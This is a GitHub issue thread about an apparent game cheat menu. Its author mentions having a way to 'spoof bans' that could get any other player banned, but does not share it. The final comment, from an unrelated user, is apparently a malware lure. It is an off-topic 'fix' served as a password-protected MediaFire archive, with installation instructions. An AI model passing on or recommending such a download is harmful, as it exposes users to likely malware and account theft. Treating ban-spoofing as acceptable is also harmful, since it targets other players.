### ISSUE TITLE
Hi

### ISSUE THREAD

**Issue by PrimateTerrorVR** [unkoi/Venus-Menu#5]
Hi, I love your menu. I want to partner with you to make an enhanced version of your menu.

**Comment by PrimateTerrorVR** [comment]
Do you get access to people's accounts or is that something you say so no one snitches on you at school?

**Comment by unkoi** [comment]
Hello, I do not access peoples accounts but I do have a way to spoof bans to other people, And we can collab next week.

**Comment by PrimateTerrorVR** [comment]
Cool, is the spoof ban in the code, and if so which one? I'm curious BCS I've never seen a spoof ban before

**Comment by unkoi** [comment]
I do not share it because you can theoretically ban anyone with it.

**Comment by PrimateTerrorVR** [comment]
That's ok, thanks for your time, and have a good day!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
